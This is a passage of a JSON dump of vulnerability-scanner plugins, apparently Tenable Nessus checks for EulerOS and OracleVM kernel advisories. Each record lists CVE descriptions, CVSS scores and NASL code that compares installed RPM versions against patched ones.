5.9-rc6. When changing screen size, an out-of-bounds\n memory write can occur leading to memory corruption or\n a denial of service. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled\n out.(CVE-2020-14390)\n\n - In the Linux kernel through 5.8.7, local attackers able\n to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering\n use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in\n net/netfilter/nf_conntrack_netlink.c, aka\n CID-1cc5ef91d2ff.(CVE-2020-25211)\n\n - The VFIO PCI driver in the Linux kernel through 5.6.13\n mishandles attempts to access disabled memory\n space.(CVE-2020-12888)\n\n - The kernel in Red Hat Enterprise Linux 7 and MRG-2 does\n not clear garbage data for SG_IO buffer, which may\n leaking sensitive information to\n userspace.(CVE-2014-8181)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing. (CVE-2020-10751)\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - An issue was discovered in the Linux kernel through\n 5.7.1. drivers/tty/vt/keyboard.c has an integer\n overflow if k_ascii is called several times in a row,\n aka CID-b86dab054059.(CVE-2020-13974)\n\n - go7007_snd_init in\n drivers/media/usb/go7007/snd-go7007.c in the Linux\n kernel before 5.6 does not call snd_card_free for a\n failure path, which causes a memory leak, aka\n CID-9453264ef586.(CVE-2019-20810)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - An issue was discovered in the Linux kernel before\n 5.4.7. The prb_calc_retire_blk_tmo() function in\n net/packet/af_packet.c can result in a denial of\n service (CPU consumption and soft lockup) in a certain\n failure case involving TPACKET_V3, aka\n CID-b43d1f9f7067.(CVE-2019-20812)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2353\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae382c7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h243\",\n \"kernel-debug-3.10.0-327.62.59.83.h243\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h243\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h243\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h243\",\n \"kernel-devel-3.10.0-327.62.59.83.h243\",\n \"kernel-headers-3.10.0-327.62.59.83.h243\",\n \"kernel-tools-3.10.0-327.62.59.83.h243\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h243\",\n \"perf-3.10.0-327.62.59.83.h243\",\n \"python-perf-3.10.0-327.62.59.83.h243\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:C"}}, {"lastseen": "2020-10-16T08:53:54", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2020-0044 for details.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-12T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2020-0044)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5108", "CVE-2019-7222", "CVE-2016-10906", "CVE-2019-15218", "CVE-2020-25285", "CVE-2019-10639", "CVE-2019-15505", "CVE-2019-19052", "CVE-2019-19062", "CVE-2020-10720", "CVE-2020-10732", "CVE-2019-19768", "CVE-2019-19965", "CVE-2020-10769", "CVE-2019-3874", "CVE-2017-8924", "CVE-2019-17075", "CVE-2020-14331", "CVE-2019-15927", "CVE-2019-20812", "CVE-2019-16746", "CVE-2019-19535", "CVE-2020-25284", "CVE-2020-1749", "CVE-2019-7221", "CVE-2020-10751", "CVE-2018-16884", "CVE-2019-10638", "CVE-2019-18885", "CVE-2018-20856", "CVE-2019-11487", "CVE-2017-8925", "CVE-2019-6974", "CVE-2019-14898", "CVE-2020-25212", "CVE-2019-19073", "CVE-2020-14314", "CVE-2017-16644", "CVE-2019-3846", "CVE-2019-20811", "CVE-2016-10905", "CVE-2018-9415", "CVE-2017-16528", "CVE-2019-20054", "CVE-2019-19049", "CVE-2019-20096"], "modified": "2020-10-12T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2020-0044.NASL", "href": "https://www.tenable.com/plugins/nessus/141374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2020-0044.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141374);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\"CVE-2016-10905\", \"CVE-2016-10906\", \"CVE-2017-16528\", \"CVE-2017-16644\", \"CVE-2017-8924\", \"CVE-2017-8925\", \"CVE-2018-16884\", \"CVE-2018-20856\", \"CVE-2018-9415\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11487\", \"CVE-2019-14898\", \"CVE-2019-15218\", \"CVE-2019-15505\", \"CVE-2019-15927\", \"CVE-2019-16746\", \"CVE-2019-17075\", \"CVE-2019-18885\", \"CVE-2019-19049\", \"CVE-2019-19052\", \"CVE-2019-19062\", \"CVE-2019-19073\", \"CVE-2019-19535\", \"CVE-2019-19768\", \"CVE-2019-19965\", \"CVE-2019-20054\", \"CVE-2019-20096\", \"CVE-2019-20811\", \"CVE-2019-20812\", \"CVE-2019-3846\", \"CVE-2019-3874\", \"CVE-2019-5108\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2020-10720\", \"CVE-2020-10732\", \"CVE-2020-10751\", \"CVE-2020-10769\", \"CVE-2020-14314\", \"CVE-2020-14331\", \"CVE-2020-1749\", \"CVE-2020-25212\", \"CVE-2020-25284\", \"CVE-2020-25285\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2020-0044)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2020-0044 for details.\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2020-October/001000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ea0c3926\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2020-October/001002.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3070470\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-124.43.4.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-124.43.4.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:06:30", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A flaw was found in the Linux kernel's implementation\n of the invert video code on VGA consoles when a local\n attacker attempts to resize the console, calling an\n ioctl VT_RESIZE, which causes an out-of-bounds write to\n occur. This flaw allows a local user with access to the\n VGA console to crash the system, potentially escalating\n their privileges on the system. The highest threat from\n this vulnerability is to data confidentiality and\n integrity as well as system\n availability.(CVE-2020-14331)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - An issue was discovered in the Linux kernel through\n 5.7.1. drivers/tty/vt/keyboard.c has an integer\n overflow if k_ascii is called several times in a row,\n aka CID-b86dab054059. NOTE: Members in the community\n argue that the integer overflow does not lead to a\n security issue in this case.(CVE-2020-13974)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - The VFIO PCI driver in the Linux kernel through 5.6.13\n mishandles attempts to access disabled memory\n space.(CVE-2020-12888)\n\n - go7007_snd_init in\n drivers/media/usb/go7007/snd-go7007.c in the Linux\n kernel before 5.6 does not call snd_card_free for a\n failure path, which causes a memory leak, aka\n CID-9453264ef586.(CVE-2019-20810)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - An issue was discovered in the Linux kernel before\n 5.4.7. The prb_calc_retire_blk_tmo() function in\n net/packet/af_packet.c can result in a denial of\n service (CPU consumption and soft lockup) in a certain\n failure case involving TPACKET_V3, aka\n CID-b43d1f9f7067.(CVE-2019-20812)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing.(CVE-2020-10751)\n\n - gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)\n\n - A signal access-control issue was discovered in the\n Linux kernel before 5.6.5, aka CID-7395ea4e65c2.\n Because exec_id in include/linux/sched.h is only 32\n bits, an integer overflow can interfere with a\n do_notify_parent protection mechanism. A child process\n can send an arbitrary signal to a parent process in a\n different security domain. Exploitation limitations\n include the amount of elapsed time before an integer\n overflow occurs, and the lack of scenarios where\n signals to a parent process present a substantial\n operational threat.(CVE-2020-12826)\n\n - The __mptctl_ioctl function in\n drivers/message/fusion/mptctl.c in the Linux kernel\n before 5.4.14 allows local users to hold an incorrect\n lock during the ioctl operation and trigger a race\n condition, i.e., a 'double fetch' vulnerability, aka\n CID-28d76df18f0a. NOTE: the vendor states 'The security\n impact of this bug is not as bad as it could have been\n because these operations are all privileged and root\n already has enormous destructive\n power.'(CVE-2020-12652)\n\n - An issue was found in Linux kernel before 5.5.4. The\n mwifiex_cmd_append_vsie_tlv() function in\n drivers/net/wireless/marvell/mwifiex/scan.c allows\n local users to gain privileges or cause a denial of\n service because of an incorrect memcpy and buffer\n overflow, aka CID-b70261a288ea.(CVE-2020-12653)\n\n - An issue was found in Linux kernel before 5.5.4.\n mwifiex_ret_wmm_get_status() in\n drivers/net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)\n\n - An issue was discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\n - A flaw was found in the Linux kernel's implementation\n of GRO in versions before 5.2. This flaw allows an\n attacker with local access to crash the\n system.(CVE-2020-10720)\n\n - An issue was discovered in the Linux kernel through\n 5.6.11. sg_write lacks an sg_remove_request call in a\n certain failure case, aka\n CID-83c6f2390040.(CVE-2020-12770)\n\n - In the Linux kernel before 5.4.12,\n drivers/input/input.c has out-of-bounds writes via a\n crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)\n\n - An issue was discovered in the stv06xx subsystem in the\n Linux kernel before 5.6.1.\n drivers/media/usb/gspca/stv06xx/stv06xx.c and\n drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)\n\n - In the netlink driver, there is a possible out of\n bounds write due to a race condition. This could lead\n to local escalation of privilege with System execution\n privileges needed. User interaction is not needed for\n exploitation.Product: AndroidVersions: Android\n kernelAndroid ID: A-65025077(CVE-2020-0066)\n\n - In the Linux kernel before 5.5.8, get_raw_socket in\n drivers/vhost/net.c lacks validation of an sk_family\n field, which might allow attackers to trigger kernel\n stack corruption via crafted system\n calls.(CVE-2020-10942)\n\n - An issue was discovered in slc_bump in\n drivers/net/can/slcan.c in the Linux kernel through\n 5.6.2. It allows attackers to read uninitialized\n can_frame data, potentially containing sensitive\n information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)\n\n - An issue was discovered in the Linux kernel through\n 5.6.2. mpol_parse_str in mm/mempolicy.c has a\n stack-based out-of-bounds write because an empty\n nodelist is mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)\n\n - An issue was discovered in the Linux kernel before\n 5.6.1. drivers/media/usb/gspca/ov519.c allows NULL\n pointer dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)\n\n - The kernel in Red Hat Enterprise Linux 7 and MRG-2 does\n not clear garbage data for SG_IO buffer, which may\n leaking sensitive information to\n userspace.(CVE-2014-8181)\n\n - In the Linux kernel 5.0.21, mounting a crafted ext4\n filesystem image, performing some operations, and\n unmounting can lead to a use-after-free in\n ext4_put_super in fs/ext4/super.c, related to\n dump_orphan_list in fs/ext4/super.c.(CVE-2019-19447)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-09-28T00:00:00", "title": "EulerOS 2.0 SP3 : kernel (EulerOS-SA-2020-2150)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11494", "CVE-2020-16166", "CVE-2020-12770", "CVE-2020-12888", "CVE-2019-20810", "CVE-2014-8181", "CVE-2020-12826", "CVE-2020-10942", "CVE-2020-11609", "CVE-2020-10720", "CVE-2019-20636", "CVE-2020-10732", "CVE-2020-10769", "CVE-2020-12654", "CVE-2020-14331", "CVE-2019-20812", "CVE-2020-15393", "CVE-2020-0066", "CVE-2020-12653", "CVE-2020-11608", "CVE-2020-10751", "CVE-2020-13143", "CVE-2020-11565", "CVE-2020-12652", "CVE-2019-19447", "CVE-2020-13974", "CVE-2019-20811", "CVE-2020-12655"], "modified": "2020-09-28T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2150.NASL", "href": "https://www.tenable.com/plugins/nessus/140917", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140917);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-8181\",\n \"CVE-2019-19447\",\n \"CVE-2019-20636\",\n \"CVE-2019-20810\",\n \"CVE-2019-20811\",\n \"CVE-2019-20812\",\n \"CVE-2020-0066\",\n \"CVE-2020-10720\",\n \"CVE-2020-10732\",\n \"CVE-2020-10751\",\n \"CVE-2020-10769\",\n \"CVE-2020-10942\",\n \"CVE-2020-11494\",\n \"CVE-2020-11565\",\n \"CVE-2020-11608\",\n \"CVE-2020-11609\",\n \"CVE-2020-12652\",\n \"CVE-2020-12653\",\n \"CVE-2020-12654\",\n \"CVE-2020-12655\",\n \"CVE-2020-12770\",\n \"CVE-2020-12826\",\n \"CVE-2020-12888\",\n \"CVE-2020-13143\",\n \"CVE-2020-13974\",\n \"CVE-2020-14331\",\n \"CVE-2020-15393\",\n \"CVE-2020-16166\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : kernel (EulerOS-SA-2020-2150)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A flaw was found in the Linux kernel's implementation\n of the invert video code on VGA consoles when a local\n attacker attempts to resize the console, calling an\n ioctl VT_RESIZE, which causes an out-of-bounds write to\n occur. This flaw allows a local user with access to the\n VGA console to crash the system, potentially escalating\n their privileges on the system. The highest threat from\n this vulnerability is to data confidentiality and\n integrity as well as system\n availability.(CVE-2020-14331)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - An issue was discovered in the Linux kernel through\n 5.7.1. drivers/tty/vt/keyboard.c has an integer\n overflow if k_ascii is called several times in a row,\n aka CID-b86dab054059. NOTE: Members in the community\n argue that the integer overflow does not lead to a\n security issue in this case.(CVE-2020-13974)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - The VFIO PCI driver in the Linux kernel through 5.6.13\n mishandles attempts to access disabled memory\n space.(CVE-2020-12888)\n\n - go7007_snd_init in\n drivers/media/usb/go7007/snd-go7007.c in the Linux\n kernel before 5.6 does not call snd_card_free for a\n failure path, which causes a memory leak, aka\n CID-9453264ef586.(CVE-2019-20810)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - An issue was discovered in the Linux kernel before\n 5.4.7. The prb_calc_retire_blk_tmo() function in\n net/packet/af_packet.c can result in a denial of\n service (CPU consumption and soft lockup) in a certain\n failure case involving TPACKET_V3, aka\n CID-b43d1f9f7067.(CVE-2019-20812)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing.(CVE-2020-10751)\n\n - gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)\n\n - A signal access-control issue was discovered in the\n Linux kernel before 5.6.5, aka CID-7395ea4e65c2.\n Because exec_id in include/linux/sched.h is only 32\n bits, an integer overflow can interfere with a\n do_notify_parent protection mechanism. A child process\n can send an arbitrary signal to a parent process in a\n different security domain. Exploitation limitations\n include the amount of elapsed time before an integer\n overflow occurs, and the lack of scenarios where\n signals to 